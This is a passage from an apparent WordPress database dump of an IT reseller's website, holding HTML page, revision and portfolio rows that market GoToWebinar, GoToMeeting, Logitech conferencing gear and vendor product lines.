screen.</h3>\r\nGoToWebinar erases the headache and hassle from webinars. No matter your goal or skill level, youâ€™ll quickly see why so many love GoToWebinar. Go from preparing a webinar to presenting in fewer steps â€“ and have a lot of fun along the way.\r\n\r\n<img class=\" wp-image-1977 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/gotowebinar.png\" alt=\"\" width=\"434\" height=\"298\" />\r\n<div class=\"check-and-text__stacked\">\r\n<ul>\r\n 	<li class=\"check-and-text__title\"><strong>Engagement Dashboard</strong> -- Keep an eye on attentiveness, hands raised and time elapsed.</li>\r\n</ul>\r\n</div>\r\n<div class=\"check-and-text__stacked\">\r\n<ul>\r\n 	<li class=\"check-and-text__title\"><strong>Presenter Webcams</strong> -- Show off your bright smile and invite panelists to do the same.</li>\r\n</ul>\r\n</div>\r\n<div class=\"check-and-text__stacked\">\r\n<ul>\r\n 	<li class=\"check-and-text__title\"><strong>Polls &amp; Surveys</strong> -- Engage your audience with slide-in questions and live results.</li>\r\n</ul>\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n&nbsp;\r\n\r\n<iframe src=\"https://www.youtube.com/embed/uDdg_Z2KzHs\" width=\"800\" height=\"450\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe>\r\n\r\n&nbsp;\r\n\r\n</div>','GoToWebinar','','publish','closed','closed','','gotowebinar','','','2019-09-30 16:28:11','2019-09-30 08:28:11','',0,'https://bintara.com.my/?page_id=1633',0,'page','',0),(1359,1,'2018-12-11 12:24:10','2018-12-11 04:24:10','We can manage any part, or your entire infrastructure. Take advantage of our wide portfolio of services. Our vendor-accredited experts cover break-fix support through to enterprise-class cloud computing solutions. ','Services','','inherit','closed','closed','','1356-revision-v1','','','2018-12-11 12:24:10','2018-12-11 04:24:10','',1356,'https://bintara.com.my/blog/2018/12/11/1356-revision-v1/',0,'revision','',0),(1361,1,'2018-12-11 12:24:53','2018-12-11 04:24:53','<a href=\"http://bintara.com.my/canon\">Read More...</a>\r\n\r\n<!--more-->\r\n\r\n<img class=\"alignnone size-full wp-image-1819\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Canon-Logo.png\" alt=\"\" width=\"1024\" height=\"681\" />','CANON','','publish','closed','closed','','canon','','','2019-01-02 16:36:59','2019-01-02 08:36:59','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=1361',0,'portfolio','',0),(1362,1,'2018-12-11 12:25:11','2018-12-11 04:25:11','At BINTARA, our comprehensive supply chain services ensure your IT estate is run efficiently and productively â€“ covering tailored procurement solutions through to complex international logistics.\r\n\r\n<!--more-->\r\n<ul>\r\n 	<li>Financial â€“ Leasing</li>\r\n 	<li>Configuration</li>\r\n</ul>','Supply Chain Services','','publish','closed','closed','','supply-chain-services','','','2018-12-17 09:23:09','2018-12-17 01:23:09','',0,'https://bintara.com.my/?page_id=1362',0,'page','',0),(1631,1,'2018-12-11 16:05:40','2018-12-11 08:05:40','<a href=\"https://bintara.com.my/gotomeeting/\">Read More...</a>\r\n\r\n<!--more-->\r\n\r\n<img class=\"alignnone size-full wp-image-1678\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Artboard-161x.png\" alt=\"\" width=\"1024\" height=\"681\" />','GOTOMEETING','','publish','closed','closed','','gotomeeting','','','2019-09-23 16:46:34','2019-09-23 08:46:34','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=1631',0,'portfolio','',0),(1632,1,'2018-12-11 16:06:55','2018-12-11 08:06:55','<h2 class=\"section-header__headline\">Connect with anyone, anywhere. On any device.</h2>\r\n<h4 class=\"section-header__subheadline\">GoToMeeting makes it easy to connect with people any way you want.</h4>\r\n<ul>\r\n 	<li>\r\n<h4>Collaborate with business managing</h4>\r\n</li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2014\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/1.jpg\" alt=\"\" width=\"673\" height=\"356\" />\r\n\r\n&nbsp;\r\n<ul>\r\n 	<li>\r\n<h4>Less note-taking with Transcripts</h4>\r\n</li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2015\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/2.png\" alt=\"\" width=\"667\" height=\"371\" />\r\n\r\n&nbsp;\r\n<ul>\r\n 	<li>\r\n<h4>Meet instantly or schedule one for later</h4>\r\n</li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2016\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3.jpg\" alt=\"\" width=\"665\" height=\"351\" />\r\n\r\n&nbsp;\r\n<ul>\r\n 	<li>\r\n<h4>Customize team setting to your needs</h4>\r\n</li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2017\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/4.jpg\" alt=\"\" width=\"652\" height=\"348\" />\r\n\r\n&nbsp;\r\n<ul>\r\n 	<li>\r\n<h4>Out of the box video conferencing</h4>\r\n</li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2018\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/5.jpg\" alt=\"\" width=\"661\" height=\"327\" />\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>','GoToMeeting','','publish','closed','closed','','gotomeeting','','','2019-09-30 14:45:33','2019-09-30 06:45:33','',0,'https://bintara.com.my/?page_id=1632',0,'page','',0),(1363,1,'2018-12-11 12:25:15','2018-12-11 04:25:15','<a href=\"http://bintara.com.my/cisco\">Read More...</a>\r\n\r\n<!--more-->\r\n\r\n<img class=\"alignnone size-full wp-image-1672\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Artboard-81x.png\" alt=\"\" width=\"1024\" height=\"681\" />','CISCO','','publish','closed','closed','','cisco','','','2019-09-23 16:24:14','2019-09-23 08:24:14','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=1363',0,'portfolio','',0),(1364,1,'2018-12-11 12:25:08','2018-12-11 04:25:08','','h570e-headset','','inherit','closed','closed','','h570e-headset','','','2018-12-11 12:25:08','2018-12-11 04:25:08','',16,'https://bintara.com.my/wp-content/uploads/2018/12/h570e-headset.png',0,'attachment','image/png',0),(1365,1,'2018-12-11 12:25:11','2018-12-11 04:25:11','At BINTARA, our comprehensive supply chain services ensure your IT estate is run efficiently and productively â€“ covering tailored procurement solutions through to complex international logistics.','Supply Chain Services','','inherit','closed','closed','','1362-revision-v1','','','2018-12-11 12:25:11','2018-12-11 04:25:11','',1362,'https://bintara.com.my/blog/2018/12/11/1362-revision-v1/',0,'revision','',0),(1366,1,'2018-12-11 12:26:10','2018-12-11 04:26:10','Graphic Design Software, Illustration Software &amp; Technical Software. <a href=\"http://bintara.com.my/coreldraw\">Read More...</a>\r\n\r\n<!--more--><img class=\"alignnone size-full wp-image-1873\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Artboard-141x.png\" alt=\"\" width=\"1024\" height=\"681\" />\r\n\r\n&nbsp;','CORELDRAW','','publish','closed','closed','','coreldraw','','','2019-09-23 16:27:00','2019-09-23 08:27:00','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=1366',0,'portfolio','',0),(1367,1,'2018-12-11 12:26:03','2018-12-11 04:26:03','We can manage any part, or your entire infrastructure. Take advantage of our wide portfolio of services. Our vendor-accredited experts cover break-fix support through to enterprise-class cloud computing solutions. ','IT Services','','inherit','closed','closed','','1356-revision-v1','','','2018-12-11 12:26:03','2018-12-11 04:26:03','',1356,'https://bintara.com.my/blog/2018/12/11/1356-revision-v1/',0,'revision','',0),(1368,1,'2018-12-11 12:27:39','2018-12-11 04:27:39','<div class=\"product-details-ctn\">\r\n<h1 class=\"product-details-name\">Logitech</h1>\r\n</div>\r\n<div class=\"product-details-ctn\">\r\n<h2>CONFERENCE CAMERAS</h2>\r\n<p class=\"lead\">Bring video collaboration to huddle rooms and large conference rooms with Logitech ConferenceCams.</p>\r\n\r\n<table border=\"0px\">\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1242 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group-300x262.png\" alt=\"\" width=\"300\" height=\"262\" />\r\n\r\n<strong>Logitech Group</strong></td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1249 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/rally-system-b2b-pdp-300x262.png\" alt=\"\" width=\"300\" height=\"262\" />\r\n\r\n<strong>Logitech Rally</strong></td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1316 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam-300x300.png\" alt=\"\" width=\"300\" height=\"300\" /><strong>Logitech MeetUp</strong></td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1318 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-connect-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n\r\n<strong>Logitech Connect</strong></td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1319 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-bcc950-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n\r\n<strong>Logitech BCC950</strong></td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1321 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n\r\n<strong>Logitech PTZ Pro 2</strong></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2 style=\"text-align: center;\">VC ROOM SOLUTIONS</h2>\r\n<p class=\"lead\" style=\"text-align: center;\">Complete room solutions from Logitech allow participants to quickly kick off and run a video conference meeting.</p>\r\n<img class=\"alignnone wp-image-1327 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/smartdock-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n\r\n<strong><span class=\"product-name\">SMARTDOCK</span></strong>\r\n<h2 style=\"text-align: center;\">WEBCAMS</h2>\r\n<p class=\"lead\" style=\"text-align: center;\">Designed to work with any VC software, Logitech webcams offer instant collaboration with high-quality HD video.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1332 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/briopictograms-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n\r\n<strong>Logitech Brio</strong></td>\r\n<td width=\"200\"><img class=\"aligncenter wp-image-1334 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/c930e-webcam-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n\r\n<strong>Logitech C9230e</strong></td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1336 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/c925e-webcam-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n\r\n<strong>Logitech C925e</strong></td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"3\" width=\"601\">Â <img class=\"wp-image-1354 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/b525-pdp-2017-refresh-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n\r\n<strong>Logitech B525</strong></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<h2></h2>\r\n<h2 style=\"text-align: center;\">HEADSETS</h2>\r\n<p class=\"lead\" style=\"text-align: center;\">Stylish and affordable, Logitech headsets are designed for long-lasting comfort to make every call more productive.</p>\r\n<img class=\"alignnone wp-image-1364 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/h570e-headset-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n\r\n<strong>Logitech H570e Headset</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<div class=\"product-details-ctn\">\r\n\r\n[maxbutton id=\"1\"]\r\n\r\n</div>','Logitech','','inherit','closed','closed','','16-revision-v1','','','2018-12-11 12:27:39','2018-12-11 04:27:39','',16,'https://bintara.com.my/blog/2018/12/11/16-revision-v1/',0,'revision','',0),(1369,1,'2018-12-11 12:27:41','2018-12-11 04:27:41','BINTARA provides the right IT solutions for you. Software solutions, hardware solutions, networking solutions, security solutions, data centre solutions, and more, are shared by experts, who are ready to meet your needs.','IT Solutions Provider','','inherit','closed','closed','','1352-revision-v1','','','2018-12-11 12:27:41','2018-12-11 04:27:41','',1352,'https://bintara.com.my/blog/2018/12/11/1352-revision-v1/',0,'revision','',0),(1370,1,'2018-12-11 12:28:20','2018-12-11 04:28:20','PCs &amp; Displays, Networking, Data Protection, Servers and Data Storage. <a href=\"https://bintara.com.my/dell-emc/\">Read More...</a><!--more-->\r\n\r\n<img class=\"alignnone size-full wp-image-1771\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DELL-EMC-logo.png\" alt=\"\" width=\"1024\" height=\"681\" />\r\n\r\n&nbsp;','DELL EMC','','publish','closed','closed','','dell-emc','','','2019-10-25 16:36:52','2019-10-25 08:36:52','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=1370',0,'portfolio','',0),(1371,1,'2018-12-11 12:28:48','2018-12-11 04:28:48','WiFi Routers, Switches and Cabling. <a href=\"http://bintara.com.my/d-link\">Read More...</a>\r\n\r\n<!--more-->\r\n\r\n<img class=\"alignnone size-full wp-image-1821\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/D-Link-Logo.png\" alt=\"\" width=\"1024\" height=\"681\" />','D-LINK','','publish','closed','closed','','d-link','','','2019-01-02 16:51:28','2019-01-02 08:51:28','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=1371',0,'portfolio','',0),(1372,1,'2018-12-11 12:28:30','2018-12-11 04:28:30','<div class=\"product-details-ctn\">\r\n<h1 class=\"product-details-name\">Logitech</h1>\r\n</div>\r\n<div class=\"product-details-ctn\">\r\n<h2>CONFERENCE CAMERAS</h2>\r\n<p class=\"lead\">Bring video collaboration to huddle rooms and large conference rooms with Logitech ConferenceCams.</p>\r\n\r\n<table border=\"0px\">\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1242 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group-300x262.png\" alt=\"\" width=\"300\" height=\"262\" />\r\n\r\n<strong>Logitech Group</strong></td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1249 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/rally-system-b2b-pdp-300x262.png\" alt=\"\" width=\"300\" height=\"262\" />\r\n\r\n<strong>Logitech Rally</strong></td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1316 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam-300x300.png\" alt=\"\" width=\"300\" height=\"300\" /><strong>Logitech MeetUp</strong></td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1318 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-connect-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n\r\n<strong>Logitech Connect</strong></td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1319 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-bcc950-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n\r\n<strong>Logitech BCC950</strong></td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1321 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n\r\n<strong>Logitech PTZ Pro 2</strong></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2 style=\"text-align: center;\">VC ROOM SOLUTIONS</h2>\r\n<p class=\"lead\" style=\"text-align: center;\">Complete room solutions from Logitech allow participants to quickly kick off and run a video conference meeting.</p>\r\n<img class=\"wp-image-1327 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/smartdock-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n<p style=\"text-align: center;\"><strong><span class=\"product-name\">SMARTDOCK</span></strong></p>\r\n\r\n<h2 style=\"text-align: center;\">WEBCAMS</h2>\r\n<p class=\"lead\" style=\"text-align: center;\">Designed to work with any VC software, Logitech webcams offer instant collaboration with high-quality HD video.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1332 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/briopictograms-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n\r\n<strong>Logitech Brio</strong></td>\r\n<td width=\"200\"><img class=\"aligncenter wp-image-1334 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/c930e-webcam-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n\r\n<strong>Logitech C9230e</strong></td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1336 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/c925e-webcam-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n\r\n<strong>Logitech C925e</strong></td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"3\" width=\"601\">Â <img class=\"wp-image-1354 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/b525-pdp-2017-refresh-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n<p style=\"text-align: center;\"><strong>Logitech B525</strong></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<h2></h2>\r\n<h2 style=\"text-align: center;\">HEADSETS</h2>\r\n<p class=\"lead\" style=\"text-align: center;\">Stylish and affordable, Logitech headsets are designed for long-lasting comfort to make every call more productive.</p>\r\n<img class=\"wp-image-1364 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/h570e-headset-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n<p style=\"text-align: center;\"><strong>Logitech H570e Headset</strong></p>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<div class=\"product-details-ctn\">\r\n\r\n[maxbutton id=\"1\"]\r\n\r\n</div>','Logitech','','inherit','closed','closed','','16-revision-v1','','','2018-12-11 12:28:30','2018-12-11 04:28:30','',16,'https://bintara.com.my/blog/2018/12/11/16-revision-v1/',0,'revision','',0),(1374,1,'2018-12-11 12:29:18','2018-12-11 04:29:18','eSignature solutions. <a href=\"http://bintara.com.my/docusign\">Read More...</a>\r\n\r\n<!--more-->\r\n\r\n<img class=\"alignnone size-full wp-image-1822\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Artboard-21x.png\" alt=\"\" width=\"1024\" height=\"681\" />','DOCUSIGN','','publish','closed','closed','','docusign','','','2019-09-23 16:36:41','2019-09-23 08:36:41','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=1374',0,'portfolio','',0),(1375,1,'2018-12-11 12:29:45','2018-12-11 04:29:45','Cloud File Sharing and Storage. <a href=\"http://bintara.com.my/dropbox\">Read More...</a><!--more-->\r\n\r\n<img class=\"alignnone size-full wp-image-1674\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Dropbox-logo.jpg\" alt=\"\" width=\"1024\" height=\"681\" />','DROPBOX','','publish','closed','closed','','dropbox','','','2019-01-02 16:51:48','2019-01-02 08:51:48','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=1375',0,'portfolio','',0),(1376,1,'2018-12-11 12:30:12','2018-12-11 04:30:12','Projectors and Printers. <a href=\"http://bintara.com.my/epson\">Read More...</a><!--more-->\r\n\r\n<img class=\"alignnone size-full wp-image-1675\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-Logo.jpg\" alt=\"\" width=\"1024\" height=\"681\" />','EPSON','','publish','closed','closed','','epson','','','2019-01-02 16:51:56','2019-01-02 08:51:56','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=1376',0,'portfolio','',0),(1378,1,'2018-12-11 12:30:47','2018-12-11 04:30:47','Standing Desks, Monitor Mounts, Mobile Carts. <a href=\"http://bintara.com.my/ergotron\">Read More...</a><!--more-->\r\n\r\n<img class=\"alignnone size-full wp-image-1676\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Artboard-121x.png\" alt=\"\" width=\"1024\" height=\"681\" />','ERGOTRON','','publish','closed','closed','','ergotron','','','2019-09-23 16:48:36','2019-09-23 08:48:36','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=1378',0,'portfolio','',0),(1379,1,'2018-12-11 12:31:07','2018-12-11 04:31:07','Antivirus and Internet Security Solutions. <a href=\"http://bintara.com.my/eset\">Read More...</a>\r\n\r\n<!--more-->\r\n\r\n<img class=\"alignnone size-full wp-image-1823\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Eset-Logo.png\" alt=\"\" width=\"1024\" height=\"681\" />','ESET','','publish','closed','closed','','eset','','','2019-01-02 16:52:22','2019-01-02 08:52:22','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=1379',0,'portfolio','',0),(1380,1,'2018-12-11 12:31:42','2018-12-11 04:31:42','Classroom Management, Endpoint Management. <a href=\"http://bintara.com.my/faronics\">Read More...</a>\r\n\r\n<!--more-->\r\n\r\n<img class=\"alignnone size-full wp-image-1825\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Faronics-Logo.png\" alt=\"\" width=\"1024\" height=\"681\" />','FARONICS','','publish','closed','closed','','faronics','','','2019-01-02 16:52:29','2019-01-02 08:52:29','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=1380',0,'portfolio','',0),(1381,1,'2018-12-11 12:31:39','2018-12-11 04:31:39','<div class=\"product-details-ctn\">\r\n<h1 class=\"product-details-name\">Logitech</h1>\r\n</div>\r\n<div class=\"product-details-ctn\">\r\n<h2>CONFERENCE CAMERAS</h2>\r\n<p class=\"lead\">Bring video collaboration to huddle rooms and large conference rooms with Logitech ConferenceCams.</p>\r\n\r\n<table border=\"0px\">\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1242 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group-300x262.png\" alt=\"\" width=\"300\" height=\"262\" />\r\n\r\n<strong>Logitech Group</strong>\r\n\r\n[maxbutton id=\"1\"]</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1249 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/rally-system-b2b-pdp-300x262.png\" alt=\"\" width=\"300\" height=\"262\" />\r\n\r\n<strong>Logitech Rally</strong>\r\n\r\n[maxbutton id=\"1\"]</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1316 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam-300x300.png\" alt=\"\" width=\"300\" height=\"300\" /><strong>Logitech MeetUp</strong>\r\n\r\n[maxbutton id=\"1\"]</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1318 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-connect-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n\r\n<strong>Logitech Connect</strong>\r\n\r\n[maxbutton id=\"1\"]</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1319 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-bcc950-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n\r\n<strong>Logitech BCC950</strong>\r\n\r\n[maxbutton id=\"1\"]</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1321 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n\r\n<strong>Logitech PTZ Pro 2</strong>\r\n\r\n[maxbutton id=\"1\"]</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2 style=\"text-align: center;\">VC ROOM SOLUTIONS</h2>\r\n<p class=\"lead\" style=\"text-align: center;\">Complete room solutions from Logitech allow participants to quickly kick off and run a video conference meeting.</p>\r\n<img class=\"wp-image-1327 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/smartdock-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n<p style=\"text-align: center;\"><strong><span class=\"product-name\">SMARTDOCK</span></strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\"]</p>\r\n&nbsp;\r\n<h2 style=\"text-align: center;\">WEBCAMS</h2>\r\n<p class=\"lead\" style=\"text-align: center;\">Designed to work with any VC software, Logitech webcams offer instant collaboration with high-quality HD video.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1332 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/briopictograms-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n\r\n<strong>Logitech Brio</strong>\r\n\r\n[maxbutton id=\"1\"]</td>\r\n<td width=\"200\"><img class=\"aligncenter wp-image-1334 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/c930e-webcam-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n\r\n<strong>Logitech C9230e</strong>\r\n\r\n[maxbutton id=\"1\"]</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1336 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/c925e-webcam-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n\r\n<strong>Logitech C925e</strong>\r\n\r\n[maxbutton id=\"1\"]</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"3\" width=\"601\">Â <img class=\"wp-image-1354 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/b525-pdp-2017-refresh-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n<p style=\"text-align: center;\"><strong>Logitech B525</strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\"]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<h2></h2>\r\n<h2 style=\"text-align: center;\">HEADSETS</h2>\r\n<p class=\"lead\" style=\"text-align: center;\">Stylish and affordable, Logitech headsets are designed for long-lasting comfort to make every call more productive.</p>\r\n<img class=\"wp-image-1364 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/h570e-headset-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n<p style=\"text-align: center;\"><strong>Logitech H570e Headset</strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\"]</p>','Logitech','','inherit','closed','closed','','16-revision-v1','','','2018-12-11 12:31:39','2018-12-11 04:31:39','',16,'https://bintara.com.my/blog/2018/12/11/16-revision-v1/',0,'revision','',0),(1382,1,'2018-12-11 12:32:59','2018-12-11 04:32:59','Network Security\r\nInfrastructure Protection\r\nApplication Security\r\nThreat Detection &amp; Prevention\r\n\r\n<a href=\"http://bintara.com.my/fortinet\">Read More...</a>\r\n\r\n<!--more-->\r\n\r\n<img class=\"alignnone size-full wp-image-1677\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Fortinet-Logo.jpg\" alt=\"\" width=\"1024\" height=\"681\" />','FORTINET','','publish','closed','closed','','fortinet','','','2019-01-02 16:52:38','2019-01-02 08:52:38','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=1382',0,'portfolio','',0),(1383,1,'2018-12-11 12:33:42','2018-12-11 04:33:42','<a href=\"https://bintara.com.my/fujixerox/\">Read More...</a>\r\n\r\n<!--more-->\r\n\r\n<img class=\"alignnone size-full wp-image-1826\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Fuji-Xerox-Logo.png\" alt=\"\" width=\"1024\" height=\"681\" />','FUJI XEROX','','publish','closed','closed','','fujixerox','','','2019-01-02 16:52:49','2019-01-02 08:52:49','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=1383',0,'portfolio','',0),(1384,1,'2018-12-11 12:34:03','2018-12-11 04:34:03','<a href=\"http://bintara.com.my/houdini\">Read More...</a>\r\n\r\n<!--more-->\r\n\r\n<img class=\"alignnone wp-image-1827 size-full\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Houdini.png\" alt=\"\" width=\"1024\" height=\"681\" />','HOUDINI','','publish','closed','closed','','houdini','','','2019-01-02 16:56:46','2019-01-02 08:56:46','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=1384',0,'portfolio','',0),(1385,1,'2018-12-11 12:34:18','2018-12-11 04:34:18','<a href=\"https://bintara.com.my/designjet-large-format-office-printers/\">Read More...</a>\r\n\r\n<!--more-->\r\n\r\n<img class=\"alignnone size-full wp-image-1681\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/HP-Logo-V2.jpg\" alt=\"\" width=\"1024\" height=\"681\" />','HP','','publish','closed','closed','','hp','','','2019-01-08 11:33:42','2019-01-08 03:33:42','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=1385',0,'portfolio','',0),(1386,1,'2018-12-11 12:34:20','2018-12-11 04:34:20','','smartdock-extender-box','','inherit','closed','closed','','smartdock-extender-box','','','2018-12-11 12:34:20','2018-12-11 04:34:20','',16,'https://bintara.com.my/wp-content/uploads/2018/12/smartdock-extender-box.png',0,'attachment','image/png',0),(1387,1,'2018-12-11 12:34:45','2018-12-11 04:34:45','Servers and Systems, Networking and Data Storage. <a href=\"http://bintara.com.my/hpe\">Read More...</a>\r\n\r\n<!--more-->\r\n\r\n<img class=\"alignnone size-full wp-image-1828\" 